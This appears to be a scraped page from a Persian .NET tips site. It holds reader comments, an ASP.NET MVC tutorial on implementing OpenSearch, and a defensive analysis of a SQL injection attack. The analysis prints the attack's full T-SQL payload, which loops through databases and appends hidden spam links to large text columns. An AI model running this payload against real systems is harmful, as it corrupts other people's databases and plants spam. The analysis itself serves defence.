سال نو مبارک، ایده جالبی بود.
مطلب جالبی بود. . . از فید دنبالت میکنیم ...
کار جالبی هست
از مطالب مفید شما هم ممنونم
از مطالب مفید شما هم ممنونم
نظرات نظرسنجیها
آیا از برگزاری دورههای دات نت غیر رایگان آنلاین توسط نویسندگان سایت در سال آینده پشتیبانی میکنید؟
ایدهی جالبی هست .
منظور دورهی ویدیویی مثل Pluralsight هست ؟
اگر به امکانات مرورگرهای جدید دقت کرده باشید، امکان تعریف منبع جستجوی جدید، نیز برای آنها وجود دارد. برای نمونه تصاویر ذیل مرتبط به مرورگرهای فایرفاکس و کروم هستند:
این مرورگرها در صورتیکه پیاده سازی پروتکل Open Search را در سایت شما پیدا کنند، به صورت خودکار امکان افزودن آنرا به عنوان منبع جستجوی جدیدی جهت جعبه متنی جستجوی خود ارائه میدهند. در ادامه قصد داریم با جزئیات پیاده سازی آن آشنا شویم.
تهیه OpenSearchResult سفارشی
برنامه باید بتواند محتوای XML ایی ذیل را مطابق پروتکل Open Search به صورت پویا تهیه و در اختیار مرورگر قرار دهد:
به همین جهت کلاس OpenSearchResult ذیل تهیه شده است تا انجام آنرا با روشی سازگار با ASP.NET MVC سهولت بخشد:
کار این Action Result، تهیه محتوایی XML ایی مطابق نمونهای است که در ابتدای توضیحات ملاحظه نمودید. توضیحات خواص آن، در ادامه مطلب ارائه شدهاند.
تهیه OpenSearchController
در ادامه برای استفاده از Action Result سفارشی تهیه شده، نیاز است یک کنترلر را نیز به برنامه اضافه کنیم:
برای استفاده از OpenSearchResult به چند نکته باید دقت داشت:
الف) آدرسهای مطرح شده در آن باید مطلق باشند و نه نسبی. به همین جهت پارامتر protocol در اینجا ذکر شده است تا سبب تولید یک چنین آدرسهایی گردد.
ب) Url.Action ایی که در اینجا استفاده شده است مطابق تعاریف T4MVC است؛ ولی کلیات آن با نمونه پیش فرض ASP.NET MVC تفاوتی نمیکند. توسط T4MVC بجای ذکر نام اکشن متد و کنترلر مد نظر به صورت رشتهای، میتوان به صورت Strongly typed به این موارد ارجاع داد.
ج) تنها نکته مهم این کلاس، خاصیت SearchUrlTemplate است. قسمت انتهایی آن یعنی ={searchTerms} همیشه ثابت است. اما ابتدای این آدرس باید به کنترلر جستجوی شما که قادر است پارامتری را به شکل کوئری استرینگ دریافت کند، اشاره نماید.
د) FavIconUrl به آدرس یک آیکن در سایت شما اشاره میکند. برای نمونه ذکر favicon.ico پیش فرض سایت میتواند مفید باشد.
معرفی OpenSearchController به Header سایت
مرحله نهایی افزودن پروتکل Open search به سایت، مراجعه به فایل layout پروژه و افزودن link خاص فوق به آن است. در این لینک، href آن باید به مسیر کنترلر OpenSearchایی که در قسمت قبل تعریف کردیم، اشاره کند. این مسیر نیز باید مطلق باشد. به همین جهت پارامتر protocol آن مقدار دهی شده است.
این مرورگرها در صورتیکه پیاده سازی پروتکل Open Search را در سایت شما پیدا کنند، به صورت خودکار امکان افزودن آنرا به عنوان منبع جستجوی جدیدی جهت جعبه متنی جستجوی خود ارائه میدهند. در ادامه قصد داریم با جزئیات پیاده سازی آن آشنا شویم.
تهیه OpenSearchResult سفارشی
برنامه باید بتواند محتوای XML ایی ذیل را مطابق پروتکل Open Search به صورت پویا تهیه و در اختیار مرورگر قرار دهد:
<?xml version="1.0" encoding="UTF-8" ? /> <OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"> <ShortName>My Site's Asset Finder</ShortName> <Description>Find all your assets</Description> <Url type="text/html" method="get" template="http://MySite.com/Home/Search/?q=searchTerms"/> <InputEncoding>UTF-8</InputEncoding> <SearchForm>http://MySite.com/</SearchForm> </OpenSearchDescription>
using System;
using System.Text;
using System.Web;
using System.Web.Mvc;
using System.Xml;
namespace WebToolkit
{
public class OpenSearchResult : ActionResult
{
public string ShortName { set; get; }
public string Description { set; get; }
public string SearchForm { set; get; }
public string FavIconUrl { set; get; }
public string SearchUrlTemplate { set; get; }
public override void ExecuteResult(ControllerContext context)
{
if (context == null)
throw new ArgumentNullException("context");
var response = context.HttpContext.Response;
writeToResponse(response);
}
private void writeToResponse(HttpResponseBase response)
{
response.ContentEncoding = Encoding.UTF8;
response.ContentType = "application/opensearchdescription+xml";
using (var xmlWriter = XmlWriter.Create(response.Output, new XmlWriterSettings { Indent = true }))
{
xmlWriter.WriteStartElement("OpenSearchDescription", "http://a9.com/-/spec/opensearch/1.1/");
xmlWriter.WriteElementString("ShortName", ShortName);
xmlWriter.WriteElementString("Description", Description);
xmlWriter.WriteElementString("InputEncoding", "UTF-8");
xmlWriter.WriteElementString("SearchForm", SearchForm);
xmlWriter.WriteStartElement("Url");
xmlWriter.WriteAttributeString("type", "text/html");
xmlWriter.WriteAttributeString("template", SearchUrlTemplate);
xmlWriter.WriteEndElement();
xmlWriter.WriteStartElement("Image");
xmlWriter.WriteAttributeString("width", "16");
xmlWriter.WriteAttributeString("height", "16");
xmlWriter.WriteString(FavIconUrl);
xmlWriter.WriteEndElement();
xmlWriter.WriteEndElement();
xmlWriter.Close();
}
}
}
}تهیه OpenSearchController
در ادامه برای استفاده از Action Result سفارشی تهیه شده، نیاز است یک کنترلر را نیز به برنامه اضافه کنیم:
using System.Web.Mvc;
namespace Readers
{
public partial class OpenSearchController : Controller
{
public virtual ActionResult Index()
{
var fullBaseUrl = Url.Action(result: MVC.Home.Index(), protocol: "http");
return new OpenSearchResult
{
ShortName = ".NET Tips",
Description = ".NET Tips Contents Search",
SearchForm = fullBaseUrl,
FavIconUrl = fullBaseUrl + "favicon.ico",
SearchUrlTemplate = Url.Action(result: MVC.Search.Index(), protocol: "http") + "?term={searchTerms}"
};
}
}
}الف) آدرسهای مطرح شده در آن باید مطلق باشند و نه نسبی. به همین جهت پارامتر protocol در اینجا ذکر شده است تا سبب تولید یک چنین آدرسهایی گردد.
ب) Url.Action ایی که در اینجا استفاده شده است مطابق تعاریف T4MVC است؛ ولی کلیات آن با نمونه پیش فرض ASP.NET MVC تفاوتی نمیکند. توسط T4MVC بجای ذکر نام اکشن متد و کنترلر مد نظر به صورت رشتهای، میتوان به صورت Strongly typed به این موارد ارجاع داد.
ج) تنها نکته مهم این کلاس، خاصیت SearchUrlTemplate است. قسمت انتهایی آن یعنی ={searchTerms} همیشه ثابت است. اما ابتدای این آدرس باید به کنترلر جستجوی شما که قادر است پارامتری را به شکل کوئری استرینگ دریافت کند، اشاره نماید.
د) FavIconUrl به آدرس یک آیکن در سایت شما اشاره میکند. برای نمونه ذکر favicon.ico پیش فرض سایت میتواند مفید باشد.
معرفی OpenSearchController به Header سایت
<link href="@Url.Action(result: MVC.OpenSearch.Index(), protocol: "http")" rel="search"
title=".NET Tips Search" type="application/opensearchdescription+xml" />
درود
با سپاس از مطالب که در سایت قرار دادید یک مشکل داشتم
من کد رو در پروژه قرار دارم اما کد زیر که قرار متن راست به چپ کنه کار نمیکنه
و کد زیر هم کار نمیکنه
اگر لطف کنید من رو راهنمایی کنید
با سپاس از مطالب که در سایت قرار دادید یک مشکل داشتم
من کد رو در پروژه قرار دارم اما کد زیر که قرار متن راست به چپ کنه کار نمیکنه
_paragraph = new Paragraph
{
Alignment = Element.ALIGN_LEFT // سبب میشود تا در حالت راست به چپ از سمت راست صفحه شروع شود
}; fixNestedTablesRunDirection(element);
من این توابع را خواندم که در مورد seo نوشته بودید ولی متاسفانه نحوه استفاده از آن هارا نفهمیدم یعنی کجا تعریف میشن و از کجا پارامترهای خود را دریافت میکنند. لطف کنید اگر امکان داره یه پروژه کوچک همه اینها استفاده شده باشه اگر هست بگذارید .
نکته دیگه شما عنوان هر پست را داخل urlها نمایش میدهید منظور اینکه جزئی از url سایت است این کار را چگونه انجام میدهید
mysite.info/post/1
dotnettips.info/post/1200/seo
با سلام
ممنون از مطالب جالب تون در این که بطور کلی در سایت هست و مخصوص در باره MVVM
می خواستم تشکر کنم که فایل ها رو بصورت PDF قرار دادید و خواهش کنم اگر امکان دارد مطالب مربوط به NHibrinate رو هم لطف کنید و بصورت PDF قرار بدهید
چون من مشکل پرینت و مطالعه این مطالب رو داشتم
می دونم کار وقت گیری هست اما زکات علم نشر آن است
یک دنیا تشکر
سعید محمدهاشم
ممنون از مطالب جالب تون در این که بطور کلی در سایت هست و مخصوص در باره MVVM
می خواستم تشکر کنم که فایل ها رو بصورت PDF قرار دادید و خواهش کنم اگر امکان دارد مطالب مربوط به NHibrinate رو هم لطف کنید و بصورت PDF قرار بدهید
چون من مشکل پرینت و مطالعه این مطالب رو داشتم
می دونم کار وقت گیری هست اما زکات علم نشر آن است
یک دنیا تشکر
سعید محمدهاشم
مدتی هست در لاگهای ELMAH سایت، یک چنین تزریقهای اس کیوال ناموفقی مشاهده میشوند:
اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آنها تبلیغات یک سری سایتهای کذایی وجود دارند، اضافه شدهاند، حتما مورد حملهی SQL Injection فوق واقع شدهاید.
مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آنرا به عنوان پارامتر سازندهی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف میشود:
ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره میکنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئریهای غیرپارامتری و یا از ORMها استفاده نمیکنید.
ج) آیا به محتوای دریافت شدهی از طریق کوئری استرینگها دقت دارید؟
این مورد نیز همانند حالت ب است.
بررسی ساختار این حمله
کوئری ارسالی (البته با حذف آدرس سایتهای کذایی آن)، یک چنین فرمتی را دارد:
در اینجا ابتدا لیست بانکهای اطلاعاتی موجود دریافت میشوند. سپس با استفاده از try/catch سعی در به روز رسانی رکوردهای جداولی که دارای فیلدهایی از نوع varchar یا nvarchar از نوع max هستند، میکند. از try/catch هم به این دلیل استفاده کردهاست که در یک سایت اشتراکی، شما فقط به بانک اطلاعاتی خودتان دسترسی دارید و البته اگر از کاربر sa استفاده میکنید که ... هم اکنون تمام بانکهای اطلاعاتی شما آلوده شدهاند!
به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آنها درج میکند.
اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آنها تبلیغات یک سری سایتهای کذایی وجود دارند، اضافه شدهاند، حتما مورد حملهی SQL Injection فوق واقع شدهاید.
مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آنرا به عنوان پارامتر سازندهی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف میشود:
ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره میکنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئریهای غیرپارامتری و یا از ORMها استفاده نمیکنید.
ج) آیا به محتوای دریافت شدهی از طریق کوئری استرینگها دقت دارید؟
این مورد نیز همانند حالت ب است.
بررسی ساختار این حمله
کوئری ارسالی (البته با حذف آدرس سایتهای کذایی آن)، یک چنین فرمتی را دارد:
DECLARE @b AS CURSOR;
DECLARE @s AS VARCHAR (8000);
DECLARE @w AS VARCHAR (99);
SET @b = CURSOR
FOR SELECT DB_NAME()
UNION
SELECT name
FROM sys.databases
WHERE (has_dbaccess(name) != 0)
AND name NOT IN ('master', 'tempdb', 'model', 'msdb', DB_NAME());
OPEN @b;
FETCH NEXT FROM @b INTO @w;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @s = 'begin try use ' + @w + ';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set
[''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">desi adult stories <a
href="http://www.site.com/">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories'''' when 1 then ''''read'''' else ''''stories'''' end +''''</a> stories</div>''''
else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME
WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while
@@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';
EXECUTE (@s);
FETCH NEXT FROM @b INTO @w;
END
CLOSE @b; به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آنها درج میکند.
سلام
اصلا unit test برای چی هست؟
اصلا unit test برای چی هست؟